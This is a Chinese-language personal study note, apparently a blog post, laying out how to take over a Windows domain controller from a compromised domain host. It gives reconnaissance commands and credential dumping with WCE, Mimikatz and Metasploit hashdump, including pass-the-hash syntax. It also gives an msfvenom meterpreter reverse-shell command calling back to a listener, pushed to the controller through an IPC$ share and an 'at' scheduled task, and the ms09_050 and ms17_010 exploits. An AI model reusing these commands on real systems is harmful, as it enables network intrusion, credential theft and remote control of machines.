內網域滲透學習小結
總結的思路可能有些亂 - - 當做個記錄而已。
獲取域中某台機器控制權后
滲透思路就是拿下域控的權限 實現對整個域的控制
0x01信息收集:
-
ipconfig /all
2.net view /domain 查看有幾個域
3.net view /domain:XXX 查看此域內電腦
4.net group /domain 查詢域里面的組
5.net group “domain admins” /domain 查看域管理員
6.net group “domain controllers” /domain 查看域控制器
7.net group “enterprise admins” /domain 查看企業管理
知道了所在域和域控的ip后(一般域控和dns為同一台服務器)
明確滲透思路:
從域主機入手:抓取域主機HASH--->登錄到域進行域控的shell反彈或者在域主機上進行hash注入 登錄到域控偽造ticket(pass the ticket)
直接從域控入手:0day溢出漏洞(smb、rdp、rpc、dns)、各種服務弱口令爆破、hash注入讀取lsa明文密碼
Ps:拿到域主機或者域控可能會遇到很多安全策略端口限制
利用lcx portfwd這些工具進行端口映射、端口轉發 再進行3389連接
- 1.使用WCE和MIMIKATZ(這2個工具必須要管理員的權限,而且注意工具的免殺)
- 2.使用MSF的hashdump模塊,一個是hashdump,只能導出本地hash,另一個是smart_hashdump(必須是管理員權限),可以導出域用戶的hash
- 3.使用Powershell模塊直接導出
抓取hash工具使用筆記:
1) WCE
常用參數
-l 默認的參數 列出登錄的會話和NTLM憑據(默認值)
-w 通過摘要式認證緩存一個明文的密碼
-s (hash注入 根本登錄憑據 即不需破出hash的明文密碼也可登錄管理)格式:wce.exe -s 用戶名:對方機器名或者ip:LM-HASH:NT-HASH
hash注入的原理是將我們預備好的目標機器的本地或者是域用戶hash注入到本地的認證進程lsass.exe中去,使得本地在使用ipc登錄目標機器的時候就如同自己登錄自己的機器一樣獲得權限。hash注入本身是為了對付那些破解不了的NTHASH。
2)MIMIKATZ
第一條:privilege::debug//提升權限
第二條:sekurlsa::logonpasswords//抓取密碼
3)使用msf中的兩個hash抓取模塊
hashdump,只能導出本地hash,另一個是smart_hashdump(必須是管理員權限),可以導出域用戶的hash
4)使用Powershell模塊直接導出
獲取了受控這台域主機后 下一步滲透就是接近我們的域控目標
分兩種情況
| A.如果不能直接攻擊域服務器,我們需要再攻擊內網某個服務器,然后再攻擊域服務器 B.可以直接攻擊域服務器 1.我們可以利用抓到的密碼加上我們收集的信息編個字典,然后添加路由進行弱口令的掃描 |
對於情況B:
使用抓取的賬號密碼 登錄到域控的ipc連接 添加任務 讓域主機定時執行我們用VEIL生成的meterpreter(或者msfvenom) 進行shell反彈
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe
生成shell.exe服務端
受控域主機 ipc連接域控
Net use \\域控ip 密碼 /user:域名\用戶名
查看共享目錄
Copy命令上傳我們的shell.exe at命令定時執行
At \\域控ip 時間 任務路徑
不過默認win2008沒有開啟計划服務
Msf監聽反彈的木馬
域控計划執行shell.exe
成功反彈域控shell
接着就是在域控上進行抓取hash
可以用Mimikatz也可以用run post/windows/gather/hashdump
這里我使用msf的hash抓取
顯示權限不夠
Getsystem一下
再次抓取域控hash
抓取成功
抓取成功后進行hash注入 注入域管理帳號 拿到域控
還有對域控直接攻擊的方法就是遠程溢出漏洞
先用nmap掃描探測常見的漏洞
發現
CVE-2009-3103存在此漏洞
上網查找了這個漏洞對應的ms漏洞編號
使用msf 利用ms09_050 進行溢出提權
拿下域控
同樣 看到開放了445 通過ms17_010一樣可以溢出提權
至於弱口令爆破 沒有嘗試 因為域控的密碼策略都是小寫大小特殊符號的組合 就一般不對域控進行弱口令爆破
